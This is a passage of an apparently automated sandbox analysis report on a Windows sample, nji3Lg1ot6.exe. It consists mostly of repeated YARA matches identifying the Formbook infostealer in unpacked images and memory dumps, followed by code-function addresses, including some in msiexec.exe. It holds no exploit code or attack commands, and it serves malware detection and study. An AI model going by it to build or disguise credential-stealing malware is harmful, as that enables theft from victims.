          Source: 1.0.nji3Lg1ot6.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.nji3Lg1ot6.exe.23e0000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.nji3Lg1ot6.exe.23e0000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.nji3Lg1ot6.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.nji3Lg1ot6.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.nji3Lg1ot6.exe.23e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.nji3Lg1ot6.exe.23e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.nji3Lg1ot6.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.nji3Lg1ot6.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.nji3Lg1ot6.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.nji3Lg1ot6.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.292323567.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.292323567.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.333023210.000000000FFA5000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.333023210.000000000FFA5000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.345328799.0000000000D30000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.345328799.0000000000D30000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.294869944.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.294869944.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.562054407.0000000002920000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.562054407.0000000002920000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.561888247.00000000028F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.561888247.00000000028F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.295727882.00000000023E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.295727882.00000000023E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.293866561.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.293866561.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: nji3Lg1ot6.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 1.0.nji3Lg1ot6.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.nji3Lg1ot6.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.nji3Lg1ot6.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.nji3Lg1ot6.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.nji3Lg1ot6.exe.23e0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.nji3Lg1ot6.exe.23e0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.nji3Lg1ot6.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.nji3Lg1ot6.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.nji3Lg1ot6.exe.23e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.nji3Lg1ot6.exe.23e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.nji3Lg1ot6.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.nji3Lg1ot6.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.nji3Lg1ot6.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.nji3Lg1ot6.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.292323567.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.292323567.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.333023210.000000000FFA5000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.333023210.000000000FFA5000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.345328799.0000000000D30000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.345328799.0000000000D30000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.294869944.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.294869944.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.562054407.0000000002920000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.562054407.0000000002920000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.561888247.00000000028F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.561888247.00000000028F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.295727882.00000000023E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.295727882.00000000023E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.293866561.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.293866561.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_00403225
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_0040604C0_2_0040604C
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_004047720_2_00404772
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_004010261_2_00401026
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041E2611_2_0041E261
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041EB711_2_0041EB71
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041E3DA1_2_0041E3DA
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041E4B41_2_0041E4B4
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00409E4B1_2_00409E4B
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00409E501_2_00409E50
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041EEB51_2_0041EEB5
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041D7DE1_2_0041D7DE
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041E79A1_2_0041E79A
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A520A01_2_00A520A0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF20A81_2_00AF20A8
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A3B0901_2_00A3B090
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF28EC1_2_00AF28EC
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AFE8241_2_00AFE824
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4A8301_2_00A4A830
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE10021_2_00AE1002
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A499BF1_2_00A499BF
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A441201_2_00A44120
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A2F9001_2_00A2F900
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF22AE1_2_00AF22AE
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00ADFA2B1_2_00ADFA2B
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5EBB01_2_00A5EBB0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AE03DA1_2_00AE03DA
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AEDBD21_2_00AEDBD2
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF2B281_2_00AF2B28
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4AB401_2_00A4AB40
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A3841F1_2_00A3841F
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AED4661_2_00AED466
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A525811_2_00A52581
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A3D5E01_2_00A3D5E0
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF25DD1_2_00AF25DD
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A20D201_2_00A20D20
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF2D071_2_00AF2D07
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF1D551_2_00AF1D55
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF2EF71_2_00AF2EF7
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A46E301_2_00A46E30
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AED6161_2_00AED616
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF1FF11_2_00AF1FF1
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AFDFCE1_2_00AFDFCE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0476D4667_2_0476D466
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B841F7_2_046B841F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04771D557_2_04771D55
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046A0D207_2_046A0D20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04772D077_2_04772D07
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046BD5E07_2_046BD5E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047725DD7_2_047725DD
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046D25817_2_046D2581
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046C6E307_2_046C6E30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0476D6167_2_0476D616
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04772EF77_2_04772EF7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04771FF17_2_04771FF1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0477DFCE7_2_0477DFCE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0477E8247_2_0477E824
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CA8307_2_046CA830
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047610027_2_04761002
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047728EC7_2_047728EC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046D20A07_2_046D20A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047720A87_2_047720A8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046BB0907_2_046BB090
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046C41207_2_046C4120
